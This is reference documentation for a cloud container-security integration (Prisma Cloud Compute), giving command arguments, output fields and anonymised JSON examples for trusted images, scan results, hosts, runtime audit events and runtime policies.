PrismaCloudCompute.TrustedImage.groups.modifiedDateThe last modified timestamp for the trusted image group.
PrismaCloudCompute.TrustedImage.groups.ownerStringThe owner of the trusted image group.
PrismaCloudCompute.TrustedImage.groups.nameStringThe name of the trusted image group.
PrismaCloudCompute.TrustedImage.groups.previousNameStringThe previous name of the trusted image group.
PrismaCloudCompute.TrustedImage.groups._idStringThe ID of the trusted image group.
PrismaCloudCompute.TrustedImage.groups.imagesUnknownThe images in the trusted image group.

Command example#

!prisma-cloud-compute-trusted-images-list

Context Example#

{
"PrismaCloudCompute": {
"TrustedImage": {
"groups": [
{
"_id": "Deny All",
"images": [
"*gg/*"
],
"modified": "2022-04-27T17:30:02.803Z",
"name": "",
"owner": "test@paloaltonetworks.com",
"previousName": ""
},
{
"_id": "TRUSTED IMAGES",
"images": [
"img/aa:*",
"img/bb:*"
],
"modified": "2023-02-27T21:35:49.697Z",
"name": "",
"owner": "test@paloaltonetworks.com",
"previousName": ""
},
{
"_id": "test",
"images": [
"img/abc:*"
],
"modified": "2023-02-28T19:53:44.491Z",
"name": "",
"owner": "test@paloaltonetworks.com",
"previousName": ""
}
],
"policy": {
"_id": "trust",
"enabled": true,
"rules": [
{
"allowedGroups": [
"test"
],
"collections": [
{
"accountIDs": [
"*"
],
"appIDs": [
"*"
],
"clusters": [
"*"
],
"codeRepos": [
"*"
],
"color": "#3FA2F7",
"containers": [
"*"
],
"description": "System - all resources collection",
"functions": [
"*"
],
"hosts": [
"*"
],
"images": [
"*"
],
"labels": [
"*"
],
"modified": "2021-01-31T08:21:54.823Z",
"name": "All",
"namespaces": [
"*"
],
"owner": "system",
"prisma": false,
"system": true
}
],
"disabled": true,
"effect": "alert",
"modified": "2023-06-08T12:28:46.723Z",
"name": "test",
"owner": "test@paloaltonetworks.com",
"previousName": ""
},
{
"collections": [
{
"accountIDs": [
"*"
],
"appIDs": [
"*"
],
"clusters": [
"*"
],
"codeRepos": [
"*"
],
"color": "#3FA2F7",
"containers": [
"*"
],
"description": "System - all resources collection",
"functions": [
"*"
],
"hosts": [
"*"
],
"images": [
"*"
],
"labels": [
"*"
],
"modified": "2021-01-31T08:21:54.823Z",
"name": "All",
"namespaces": [
"*"
],
"owner": "system",
"prisma": false,
"system": true
}
],
"disabled": true,
"effect": "alert",
"modified": "2022-04-27T19:24:00.987Z",
"name": "Default - alert all",
"owner": "test@paloaltonetworks.com",
"previousName": ""
}
]
}
}
}
}

Human Readable Output#

Trusted Images Details#

Policy Rules Information#

Rule NameEffectOwnerAllowed GroupsModified
testalerttest@paloaltonetworks.comtest2023-06-08T12:28:46.723Z
Default - alert allalerttest@paloaltonetworks.com2022-04-27T19:24:00.987Z

Trust Groups Information#

IDOwnerModified
Deny Alltest@paloaltonetworks.com2022-04-27T17:30:02.803Z
TRUSTED IMAGEStest@paloaltonetworks.com2023-02-27T21:35:49.697Z
testtest@paloaltonetworks.com2023-02-28T19:53:44.491Z

prisma-cloud-compute-trusted-images-update#


Updates a trusted image to the system. Specify trusted images using either the image name or layers properties. This is a potentially harmful command, so use with caution.

Base Command#

prisma-cloud-compute-trusted-images-update

Input#

Argument NameDescriptionRequired
images_list_jsonJSON containing the list of trusted images to update. In order to view the structure, use prisma-cloud-compute-trusted-images-list to retrieve the current state of the list.Required

Context Output#

There is no context output for this command.

prisma-cloud-compute-container-scan-results-list#


Retrieves container scan reports. Maps to Monitor > Compliance > Images > Deployed in the Console UI.

Base Command#

prisma-cloud-compute-container-scan-results-list

Input#

Argument NameDescriptionRequired
collectionsA comma-separated list of collection names that you have defined in Prisma Cloud Compute.Optional
account_idsA comma-separated list of cloud account IDs.Optional
clustersA comma-separated list of clusters to filter by.Optional
namespacesA comma-separated list of namespaces to filter by.Optional
resource_idsA comma-separated list of resource IDs to scope the query by.Optional
regionA comma-separated list of regions to scope the query by.Optional
container_idsA comma-separated list of container IDs to retrieve details for.Optional
profile_idA comma-separated list of runtime profile IDs to filter by.Optional
image_nameA comma-separated list of image names to filter by.Optional
image_idA comma-separated list of image IDs to filter by.Optional
hostnameA comma-separated list of hostnames to filter by.Optional
compliance_idsA comma-separated list of compliance IDs to filter by.Optional
agentlessWhether to filter by agentless scans. Possible values are: true, false.Optional
searchTerm to search for.Optional
limitThe maximum number of container scan reports to return. Must be between 1-50. Default is 50.Optional
offsetThe offset by which to begin listing container scan reports. Default is 0.Optional
all_resultsWhether to retrieve all results. The "limit" argument will be ignored. Using this argument may return a lot of results and might slow down the command run time. Therefore, it is not recommended to be used often. Possible values are: true, false. Default is false.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ContainersScanResults._idStringThe container scan ID.
PrismaCloudCompute.ContainersScanResults.hostnameStringThe container hostname.
PrismaCloudCompute.ContainersScanResults.scanTimeDateThe container scan time.
PrismaCloudCompute.ContainersScanResults.collectionsUnknownThe collections the container belongs to.
PrismaCloudCompute.ContainersScanResults.firewallProtectionUnknownFirewall protection data.
PrismaCloudCompute.ContainersScanResults.csaBooleanContainer security assessment data.
PrismaCloudCompute.ContainersScanResults.info.nameStringThe container name.
PrismaCloudCompute.ContainersScanResults.info.profileIDStringThe profile ID.
PrismaCloudCompute.ContainersScanResults.info.infraBooleanWhether the container is infrastructure.
PrismaCloudCompute.ContainersScanResults.info.idStringThe container ID.
PrismaCloudCompute.ContainersScanResults.info.ImageIDStringThe container image ID.
PrismaCloudCompute.ContainersScanResults.info.imageStringThe container image.
PrismaCloudCompute.ContainersScanResults.info.imageNameStringThe container image name.
PrismaCloudCompute.ContainersScanResults.info.appStringThe container application name.
PrismaCloudCompute.ContainersScanResults.info.namespaceStringThe container namespace.
PrismaCloudCompute.ContainersScanResults.info.clusterStringThe container cluster name.
PrismaCloudCompute.ContainersScanResults.info.clusterTypeStringThe container cluster type.
PrismaCloudCompute.ContainersScanResults.info.externalLabelsUnknownContainer external labels.
PrismaCloudCompute.ContainersScanResults.info.complianceIssuesUnknownCompliance issues found.
PrismaCloudCompute.ContainersScanResults.info.allComplianceUnknownAll compliance data.
PrismaCloudCompute.ContainersScanResults.info.complianceIssuesCountNumberNumber of compliance issues.
PrismaCloudCompute.ContainersScanResults.info.complianceRiskScoreNumberCompliance risk score.
PrismaCloudCompute.ContainersScanResults.info.complianceDistributionUnknownCompliance issue distribution.
PrismaCloudCompute.ContainersScanResults.info.processesUnknownContainer processes data.
PrismaCloudCompute.ContainersScanResults.info.networkUnknownNetwork data.
PrismaCloudCompute.ContainersScanResults.info.labelsUnknownContainer labels.
PrismaCloudCompute.ContainersScanResults.info.installedProductsUnknownInstalled products data.
PrismaCloudCompute.ContainersScanResults.info.cloudMetadataUnknownCloud metadata.
PrismaCloudCompute.ContainersScanResults.info.startTimeDateContainer start time.

Command example#

!prisma-cloud-compute-container-scan-results-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"ContainersScanResults": [
{
"_id": "a1",
"collections": [
"All",
"Access Group"
],
"csa": false,
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"hostname": "a1",
"info": {
"allCompliance": {},
"app": "a2",
"cloudMetadata": {
"accountID": "ii",
"image": "img",
"name": "a1",
"provider": "gcp",
"region": "europe-west4-c",
"resourceID": "4"
},
"cluster": "demo",
"clusterType": "GKE",
"complianceDistribution": {
"critical": 7,
"high": 5,
"low": 0,
"medium": 0,
"total": 12
},
"complianceIssues": [
{
"cause": "",
"cri": false,
"cve": "",
"cvss": 0,
"description": "Process ID (PID) namespaces isolate the process ID number space",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"fixDate": 0,
"functionLayer": "",
"id": 515,
"layerTime": 0,
"link": "",
"packageName": "",
"packageVersion": "",
"published": 0,
"riskFactors": null,
"secret": {},
"severity": "critical",
"status": "",
"templates": [
"GGG"
],
"text": "",
"title": "Do not share the process namespace",
"twistlock": false,
"type": "container",
"vecStr": "",
"wildfireMalware": {}
}
],
"complianceIssuesCount": 12,
"complianceRiskScore": 7050000,
"id": "a4",
"image": "img3",
"imageID": "sha256:a5",
"imageName": "img5",
"infra": false,
"installedProducts": {
"crio": true
},
"labels": [
"aa"
],
"name": "a7",
"namespace": "system",
"network": {
"ports": []
},
"processes": [
{
"name": "a7"
}
],
"profileID": "sha256:a3",
"startTime": "2023-09-10T01:46:16.542Z"
},
"scanTime": "2023-09-26T01:46:44.579Z"
},
{
"_id": "a2",
"agentless": true,
"agentlessScanID": 476,
"collections": [
"All"
],
"csa": false,
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"hostname": "hostname",
"info": {
"allCompliance": {},
"app": "app9",
"cloudMetadata": {
"accountID": "66",
"image": "img7",
"name": "a5-master",
"provider": "aws",
"region": "eu-south-1",
"resourceID": "i-3",
"type": "m5.xlarge"
},
"cluster": "a5",
"clusterType": "",
"complianceDistribution": {
"critical": 7,
"high": 5,
"low": 0,
"medium": 0,
"total": 12
},
"complianceIssues": [
{
"cause": "",
"cri": true,
"cve": "",
"cvss": 0,
"description": "The main container's host has full access to its network interfaces",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"fixDate": 0,
"functionLayer": "",
"id": 5059,
"layerTime": 0,
"link": "",
"packageName": "",
"packageVersion": "",
"published": 0,
"riskFactors": null,
"secret": {},
"severity": "critical",
"status": "",
"templates": null,
"text": "",
"title": "Do not share the host's network namespace",
"twistlock": false,
"type": "container",
"vecStr": "",
"wildfireMalware": {}
}
],
"complianceIssuesCount": 12,
"complianceRiskScore": 7050000,
"id": "a5",
"image": "a7",
"imageID": "a9",
"imageName": "a7",
"infra": false,
"installedProducts": {
"crio": true
},
"labels": [
"tag"
],
"name": "aaa",
"namespace": "test",
"network": {
"ports": []
},
"processes": [],
"profileID": "a9_test_a5",
"startTime": "2022-09-14T09:07:18.502Z"
},
"scanTime": "2023-09-26T00:20:45.054Z"
}
]
}
}

Human Readable Output#

CI Scan Information#

IDHostnameScan TimeImage IDImage NameNameApp
a1a12023-09-26T01:46:44.579Zsha256:a1img5hhha2
a5hostname2023-09-26T00:20:45.054Za9a7a9test

prisma-cloud-compute-hosts-list#


Returns minimal information that includes hostname, distro, distro-release, collections, clusters, and agentless about all deployed hosts.

Base Command#

prisma-cloud-compute-hosts-list

Input#

Argument NameDescriptionRequired
collectionsA comma-separated list of collection names that you have defined in Prisma Cloud Compute.Optional
account_idsA comma-separated list of cloud account IDs.Optional
clustersA comma-separated list of clusters to filter by.Optional
resource_idsA comma-separated list of resource IDs to scope the query by.Optional
regionA comma-separated list of regions to scope the query by.Optional
hostnameA comma-separated list of hostnames to filter by.Optional
compliance_idsA comma-separated list of compliance IDs to filter by.Optional
agentlessWhether to filter by agentless scans. Possible values are: true, false.Optional
searchTerm to search for.Optional
limitThe maximum number of container scan reports to return. Must be between 1-50. Default is 50.Optional
offsetThe offset by which to begin listing container scan reports. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.Hosts._idStringThe host ID.
PrismaCloudCompute.Hosts.typeStringThe host type.
PrismaCloudCompute.Hosts.hostnameStringThe host hostname.
PrismaCloudCompute.Hosts.scanTimeDateThe host scan time.
PrismaCloudCompute.Hosts.SecretsUnknownSecrets found on the host.
PrismaCloudCompute.Hosts.osDistroStringThe OS distribution.
PrismaCloudCompute.Hosts.osDistroVersionStringThe OS distribution version.
PrismaCloudCompute.Hosts.osDistroReleaseStringThe OS distribution release.
PrismaCloudCompute.Hosts.distroStringThe host distribution.
PrismaCloudCompute.Hosts.foundSecretsBooleanWhether secrets were found.
PrismaCloudCompute.Hosts.vulnerabilitiesCountNumberNumber of vulnerabilities found.
PrismaCloudCompute.Hosts.complianceIssuesCountNumberNumber of compliance issues found.
PrismaCloudCompute.Hosts.vulnerabilityRiskScoreNumberThe host's vulnerability risk score.
PrismaCloudCompute.Hosts.complianceRiskScoreNumberThe host's compliance risk score.
PrismaCloudCompute.Hosts.riskFactorsUnknownRisk factors for the host.
PrismaCloudCompute.Hosts.collectionsUnknownThe collections the host belongs to.
PrismaCloudCompute.Hosts.agentlessBooleanWhether the host was scanned agentlessly.

Command example#

!prisma-cloud-compute-hosts-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"Hosts": [
{
"Secrets": null,
"_id": "a9",
"agentless": false,
"allCompliance": {},
"appEmbedded": false,
"binaries": null,
"cloudMetadata": {},
"collections": [
"All"
],
"complianceDistribution": {
"critical": 0,
"high": 0,
"low": 0,
"medium": 0,
"total": 0
},
"complianceIssues": null,
"complianceIssuesCount": 0,
"complianceRiskScore": 0,
"creationTime": "0001-01-01T00:00:00Z",
"distro": "Ubuntu 20.04.4 LTS",
"err": "",
"files": null,
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"firstScanTime": "0001-01-01T00:00:00Z",
"foundSecrets": null,
"history": null,
"hostname": "a9",
"hosts": null,
"image": {
"created": "0001-01-01T00:00:00Z"
},
"installedProducts": {},
"instances": null,
"isARM64": false,
"malwareAnalyzedTime": "0001-01-01T00:00:00Z",
"osDistro": "",
"osDistroRelease": "focal",
"osDistroVersion": "",
"packageCorrelationDone": false,
"packageManager": false,
"packages": null,
"pushTime": "0001-01-01T00:00:00Z",
"redHatNonRPMImage": false,
"repoDigests": null,
"repoTag": null,
"riskFactors": null,
"scanID": 0,
"scanTime": "0001-01-01T00:00:00Z",
"secretScanMetrics": {},
"startupBinaries": null,
"tags": null,
"trustStatus": "",
"type": "",
"vulnerabilities": null,
"vulnerabilitiesCount": 0,
"vulnerabilityDistribution": {
"critical": 0,
"high": 0,
"low": 0,
"medium": 0,
"total": 0
},
"vulnerabilityRiskScore": 0,
"wildFireUsage": null
},
{
"Secrets": null,
"_id": "a4",
"agentless": false,
"allCompliance": {},
"appEmbedded": false,
"binaries": null,
"cloudMetadata": {},
"collections": [
"All"
],
"complianceDistribution": {
"critical": 0,
"high": 0,
"low": 0,
"medium": 0,
"total": 0
},
"complianceIssues": null,
"complianceIssuesCount": 0,
"complianceRiskScore": 0,
"creationTime": "0001-01-01T00:00:00Z",
"distro": "Ubuntu 20.04.4 LTS",
"err": "",
"files": null,
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"firstScanTime": "0001-01-01T00:00:00Z",
"foundSecrets": null,
"history": null,
"hostname": "hostname3",
"hosts": null,
"image": {
"created": "0001-01-01T00:00:00Z"
},
"installedProducts": {},
"instances": null,
"isARM64": false,
"malwareAnalyzedTime": "0001-01-01T00:00:00Z",
"osDistro": "",
"osDistroRelease": "focal",
"osDistroVersion": "",
"packageCorrelationDone": false,
"packageManager": false,
"packages": null,
"pushTime": "0001-01-01T00:00:00Z",
"redHatNonRPMImage": false,
"repoDigests": null,
"repoTag": null,
"riskFactors": null,
"scanID": 0,
"scanTime": "0001-01-01T00:00:00Z",
"secretScanMetrics": {},
"startupBinaries": null,
"tags": null,
"trustStatus": "",
"type": "",
"vulnerabilities": null,
"vulnerabilitiesCount": 0,
"vulnerabilityDistribution": {
"critical": 0,
"high": 0,
"low": 0,
"medium": 0,
"total": 0
},
"vulnerabilityRiskScore": 0,
"wildFireUsage": null
}
]
}
}

Human Readable Output#

Hosts Information#

IDHostnameScan TimeDistroDistro Release
a9a90001-01-01T00:00:00ZUbuntu 20.04.4 LTSfocal
a4hostname10001-01-01T00:00:00ZUbuntu 20.04.4 LTSfocal

prisma-cloud-compute-runtime-container-audit-events-list#


Retrieves all container audit events when a runtime sensor such as process, network, file system, or system call detects an activity that deviates from the predictive model.

Base Command#

prisma-cloud-compute-runtime-container-audit-events-list

Input#

Argument NameDescriptionRequired
collectionsA comma-separated list of collection names that you have defined in Prisma Cloud Compute.Optional
account_idsA comma-separated list of cloud account IDs.Optional
clustersA comma-separated list of cluster names.Optional
namespacesA comma-separated list of namespace names.Optional
resource_idsA comma-separated list of resource IDs.Optional
regionA comma-separated list of cloud region names.Optional
audit_idA comma-separated list of audit event IDs.Optional
profile_idA comma-separated list of runtime profile IDs.Optional
image_nameA comma-separated list of image names.Optional
containerA comma-separated list of container names.Optional
container_idA comma-separated list of container IDs.Optional
typeA comma-separated list of audit event types.Optional
effectA comma-separated list of audit event effects.Optional
userA comma-separated list of users.Optional
osA comma-separated list of operating systems.Optional
appA comma-separated list of applications.Optional
hostnameA comma-separated list of hostnames.Optional
searchTerm to search for.Optional
limitThe maximum number of container scan reports to return. Must be between 1-50. Default is 50.Optional
offsetThe offset by which to begin listing container scan reports. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.RuntimeContainerAuditEvents.osStringThe operating system of the container.
PrismaCloudCompute.RuntimeContainerAuditEvents._idStringThe audit event ID.
PrismaCloudCompute.RuntimeContainerAuditEvents.timeDateThe audit event time.
PrismaCloudCompute.RuntimeContainerAuditEvents.hostnameStringThe hostname.
PrismaCloudCompute.RuntimeContainerAuditEvents.fqdnStringThe audited event container's fully qualified domain name.
PrismaCloudCompute.RuntimeContainerAuditEvents.userStringThe audited event user.
PrismaCloudCompute.RuntimeContainerAuditEvents.typeStringThe audit event type.
PrismaCloudCompute.RuntimeContainerAuditEvents.containerIdStringThe container ID.
PrismaCloudCompute.RuntimeContainerAuditEvents.containerNameStringThe container name.
PrismaCloudCompute.RuntimeContainerAuditEvents.imageNameStringThe image name.
PrismaCloudCompute.RuntimeContainerAuditEvents.imageIdStringThe image ID.
PrismaCloudCompute.RuntimeContainerAuditEvents.namespaceStringThe namespace.
PrismaCloudCompute.RuntimeContainerAuditEvents.effectStringThe audit event effect.
PrismaCloudCompute.RuntimeContainerAuditEvents.ruleNameStringThe rule name.
PrismaCloudCompute.RuntimeContainerAuditEvents.msgStringThe audit event message.
PrismaCloudCompute.RuntimeContainerAuditEvents.profileIdStringThe profile ID.
PrismaCloudCompute.RuntimeContainerAuditEvents.pidNumberThe process ID.
PrismaCloudCompute.RuntimeContainerAuditEvents.processPathStringThe process path.
PrismaCloudCompute.RuntimeContainerAuditEvents.collectionsUnknownThe collections.
PrismaCloudCompute.RuntimeContainerAuditEvents.attackTypeStringThe attack type.
PrismaCloudCompute.RuntimeContainerAuditEvents.countNumberThe count of audit events.
PrismaCloudCompute.RuntimeContainerAuditEvents.containerBooleanWhether the audit event was from a container.
PrismaCloudCompute.RuntimeContainerAuditEvents.severityStringThe severity of the audit event.
PrismaCloudCompute.RuntimeContainerAuditEvents.regionStringThe region of the container.
PrismaCloudCompute.RuntimeContainerAuditEvents.accountIDStringThe account ID of the container.
PrismaCloudCompute.RuntimeContainerAuditEvents.clusterStringThe cluster of the container.
PrismaCloudCompute.RuntimeContainerAuditEvents.filepathStringThe file path of the audit event.
PrismaCloudCompute.RuntimeContainerAuditEvents.md5StringThe MD5 hash of the file.
PrismaCloudCompute.RuntimeContainerAuditEvents.commandStringThe command of the audit event.
PrismaCloudCompute.RuntimeContainerAuditEvents.providerStringThe provider of the container.

Command example#

!prisma-cloud-compute-runtime-container-audit-events-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"RuntimeContainerAuditEvents": [
{
"_id": "a9",
"accountID": "11",
"attackType": "malwareFileFeed",
"cluster": "pc-demo-eks-ii",
"collections": [
"All"
],
"command": "cmd",
"container": true,
"containerId": "c2",
"containerName": "python-server-app",
"count": 1,
"effect": "block",
"filepath": "f5",
"fqdn": "",
"hostname": "hostname4",
"imageId": "sha256:r4",
"imageName": "r6",
"md5": "r8",
"msg": "msg6",
"namespace": "default",
"os": "Ubuntu 22.04.2 LTS",
"pid": 6283,
"processPath": "/usr/bin/git",
"profileId": "sha256:r4_default_pc-demo-eks-ii",
"provider": "aws",
"region": "eu-central-1",
"ruleName": "ii-pc-advanced-demo-eks-block",
"severity": "high",
"time": "2023-08-20T12:44:45.128Z",
"type": "filesystem",
"user": "root"
},
{
"_id": "b5",
"accountID": "s4",
"attackType": "malwareFileFeed",
"cluster": "pc-github",
"collections": [
"All"
],
"command": "cmd",
"container": true,
"containerId": "t6",
"containerName": "na6",
"count": 1,
"effect": "block",
"filepath": "f5",
"fqdn": "",
"hostname": "n7",
"imageId": "sha256:n6",
"imageName": "img6",
"md5": "r8",
"msg": "msg6",
"namespace": "default",
"os": "Ubuntu 22.04.3 LTS",
"pid": 25597,
"processPath": "/usr/bin/git",
"profileId": "sha256:n6_default_pc-github",
"provider": "aws",
"region": "us-east-2",
"ruleName": "ii-pc-advanced-demo-eks-block",
"severity": "high",
"time": "2023-08-20T12:45:45.405Z",
"type": "filesystem",
"user": "root"
}
]
}
}

Human Readable Output#

Runtime Container Audit Events Information#

IDHostnameContainer NameImage NameEffectTypeAttack TypeSeverity
a9hostname4python-server-appr6blockfilesystemmalwareFileFeedhigh
b5n7na6img6blockfilesystemmalwareFileFeedhigh

prisma-cloud-compute-archive-audit-incident#


Acknowledges an incident and moves it to an archived state.

Base Command#

prisma-cloud-compute-archive-audit-incident

Input#

Argument NameDescriptionRequired
incident_idIncident ID.Required
actionAction for the command. archive - incident will be archived, unarchive - incident will be unarchived. Possible values are: archive, unarchive. Default is archive.Optional

Command example#

!prisma-cloud-compute-archive-audit-incident incident_id="1111"

Human Readable Output#

Incident 1111 was successfully archived

prisma-cloud-compute-runtime-host-audit-events-list#


Retrieves the runtime host audit events.

Base Command#

prisma-cloud-compute-runtime-host-audit-events-list

Input#

Argument NameDescriptionRequired
clustersA comma-separated list of cluster names.Optional
namespacesA comma-separated list of namespace names.Optional
audit_idA comma-separated list of audit event IDs.Optional
profile_idA comma-separated list of runtime profile IDs.Optional
image_nameA comma-separated list of image names.Optional
containerA comma-separated list of container names.Optional
container_idA comma-separated list of container IDs.Optional
typeA comma-separated list of audit event types.Optional
effectA comma-separated list of audit event effects.Optional
userA comma-separated list of users.Optional
osA comma-separated list of operating systems.Optional
appA comma-separated list of applications.Optional
hostnameA comma-separated list of hostnames.Optional
timeTime is used to filter by audit time.Optional
attack_typeAttackTypes is used to filter by runtime audit attack type.Optional
limitThe maximum number of container scan reports to return. Must be between 1-50. Default is 50.Optional
offsetThe offset by which to begin listing container scan reports. Default is 0.Optional
all_resultsWhether to retrieve all results. The "limit" argument will be ignored. Using this argument may return a lot of results and might slow down the command run time. Therefore, it is not recommended to be used often. Possible values are: true, false. Default is false.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.RuntimeHostAuditEvents._idStringThe audit event ID.
PrismaCloudCompute.RuntimeHostAuditEvents.accountIDStringThe account ID of the container.
PrismaCloudCompute.RuntimeHostAuditEvents.appStringThe app.
PrismaCloudCompute.RuntimeHostAuditEvents.attackTypeStringThe attack type.
PrismaCloudCompute.RuntimeHostAuditEvents.attackTechniquesUnknownAttack technique of the event
PrismaCloudCompute.RuntimeHostAuditEvents.collectionsUnknownThe collections.
PrismaCloudCompute.RuntimeHostAuditEvents.commandStringThe command of the audit event.
PrismaCloudCompute.RuntimeHostAuditEvents.countNumberThe count of audit events.
PrismaCloudCompute.RuntimeHostAuditEvents.effectStringThe audit event effect.
PrismaCloudCompute.RuntimeHostAuditEvents.filepathStringThe file path of the audit event.
PrismaCloudCompute.RuntimeHostAuditEvents.fqdnStringThe fully qualified domain name used in the audit event.
PrismaCloudCompute.RuntimeHostAuditEvents.events.hostnameStringThe hostname on which the command was invoked.
PrismaCloudCompute.RuntimeHostAuditEvents.md5StringThe MD5 hash of the file.
PrismaCloudCompute.RuntimeHostAuditEvents.msgStringThe audit event message.
PrismaCloudCompute.RuntimeHostAuditEvents.pidNumberThe process ID.
PrismaCloudCompute.RuntimeHostAuditEvents.processPathStringThe process path.
PrismaCloudCompute.RuntimeHostAuditEvents.profileIdStringThe profile ID.
PrismaCloudCompute.RuntimeHostAuditEvents.providerStringThe provider of the container.
PrismaCloudCompute.RuntimeHostAuditEvents.regionStringThe region of the container.
PrismaCloudCompute.RuntimeHostAuditEvents.resourceIDStringThe resource ID of the event.
PrismaCloudCompute.RuntimeHostAuditEvents.ruleNameStringThe rule name.
PrismaCloudCompute.RuntimeHostAuditEvents.severityStringThe severity of the audit event.
PrismaCloudCompute.RuntimeHostAuditEvents.timeDateThe audit event time.
PrismaCloudCompute.RuntimeHostAuditEvents.typeStringThe audit event type.
PrismaCloudCompute.RuntimeHostAuditEvents.userStringThe audited event user.

Command example#

!prisma-cloud-compute-runtime-host-audit-events-list limit=1

Context Example#

{
"PrismaCloudCompute": {
"RuntimeHostAuditEvents": {
"_id": "2222",
"accountID": "3333",
"app": "test.amazon-test-agent.amazon-test-agent",
"attackType": "unknownOriginBinary",
"collections": [
"BDausses_Collection",
"3333",
"testk"
],
"command": "/usr/bin/python3.6",
"count": 1,
"effect": "alert",
"filepath": "/var/log/amazon/test/patch-baseline-operations/simplejson/_speedups.so",
"fqdn": "",
"hostname": "test.ec2.internal",
"md5": "1aaaaa",
"msg": "/usr/bin/python3.6, which is not a known OS distribution package manager wrote the binary /var/log/amazon/test/patch-baseline-operations/simplejson/_speedups.so. MD5: 1aaaaa. Command: python3",
"pid": 4808,
"processPath": "/usr/bin/python3.6",
"profileId": "test.ec2.internal",
"provider": "aws",
"region": "us-east-1",
"resourceID": "i-test",
"ruleName": "Windows File System Check",
"severity": "high",
"time": "2024-01-17T09:42:56.679Z",
"type": "filesystem",
"user": "root"
}
}
}

Human Readable Output#

Runtime Host Audit Events Information#

IDHostnameUserTypeAttackTypeMessageSeverityEffect
2222ip-10-10-10-76.ec2.internalrootfilesystemunknownOriginBinary/usr/bin/python3.6, which is not a known OS distribution package manager wrote the binary /var/log/amazon/ssm/patch-baseline-operations/simplejson/_speedups.so. MD5: 038ebdb3fb23a04fc288b2eb01a7da70. Command: python3highalert

prisma-cloud-compute-runtime-container-policy-list#


Retrieves the runtime policy for containers protected by Defender. A policy consists of ordered rules.

Base Command#

prisma-cloud-compute-runtime-container-policy-list

Input#

Argument NameDescriptionRequired
all_resultsWhether to retrieve all results. The "limit" argument will be ignored. Using this argument may return a lot of results and might slow down the command run time. Therefore, it is not recommended to be used often. Possible values are: true, false. Default is false.Optional
limitThe maximum number of container scan reports to return. Must be between 1-50. Default is 50.Optional
offsetThe offset by which to begin listing container scan reports. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.Policies.RuntimeContainerPolicy.nameDateThe audit event time.
PrismaCloudCompute.Policies.RuntimeContainerPolicy.ownerStringThe audit event type.
PrismaCloudCompute.Policies.RuntimeContainerPolicy.modifiedDateThe audited event modified time.

Command example#

!prisma-cloud-compute-runtime-container-policy-list limit=1

Context Example#

{
"PrismaCloudCompute": {
"Policies": {
"RuntimeContainerPolicy": {
"advancedProtectionEffect": "alert",
"cloudMetadataEnforcementEffect": "alert",
"collections": [
{
"accountIDs": [
"*"
],
"appIDs": [
"*"
],
"clusters": [
"*"
],
"codeRepos": [
"*"
],
"color": "#53EB1C",
"containers": [
"*"
],
"functions": [
"*"
],
"hosts": [
"test-worker01",
"test-master02",
"test-worker02",
"test-worker03"
],
"images": [
"test/mirrored*",
"test/hyperkube*"
],
"labels": [
"*"
],
"modified": "2024-01-12T16:35:54.402Z",
"name": "test-collection-test",
"namespaces": [
"*"
],
"owner": "test1@paloaltonetworks.com",
"prisma": false,
"system": false
}
],
"dns": {
"defaultEffect": "alert",
"disabled": true,
"domainList": {
"allowed": [],
"denied": [],
"effect": "disable"
}
},
"filesystem": {
"allowedList": [],
"backdoorFilesEffect": "alert",
"defaultEffect": "alert",
"deniedList": {
"effect": "disable",
"paths": []
},
"disabled": false,
"encryptedBinariesEffect": "alert",
"newFilesEffect": "alert",
"suspiciousELFHeadersEffect": "alert"
},
"kubernetesEnforcementEffect": "alert",
"modified": "2024-01-12T16:52:25.358Z",
"name": "test-monitor-test",
"network": {
"allowedIPs": [
"127.0.0.1"
],
"defaultEffect": "alert",
"deniedIPs": [],
"deniedIPsEffect": "disable",
"disabled": false,
"listeningPorts": {
"allowed": [],
"denied": [],
"effect": "disable"
},
"modifiedProcEffect": "alert",
"outboundPorts": {
"allowed": [
{
"deny": false,
"end": 6443,
"start": 6443
}
],
"denied": [],
"effect": "disable"
},
"portScanEffect": "alert",
"rawSocketsEffect": "alert"
},
"owner": "test2@paloaltonetworks.com",
"previousName": "",
"processes": {
"allowedList": [],
"checkParentChild": true,
"cryptoMinersEffect": "alert",
"defaultEffect": "alert",
"deniedList": {
"effect": "disable",
"paths": []
},
"disabled": false,
"lateralMovementEffect": "alert",
"modifiedProcessEffect": "alert",
"reverseShellEffect": "alert",
"suidBinariesEffect": "disable"
},
"skipExecSessions": true,
"wildFireAnalysis": "alert"
}
}
}
}

Human Readable Output#

Runtime Container Policy Events Information#

NameOwnerModified
rke-monitor-ruleavega@paloaltonetworks.com2024-01-12T16:52:25.358Z

General Note:#

  • Do not use the reset last run button as it will cause incidents duplications to the instance.
  • In case you pressed reset last run button and you get duplicated incidents, run prisma-cloud-compute-unstuck-fetch-stream command.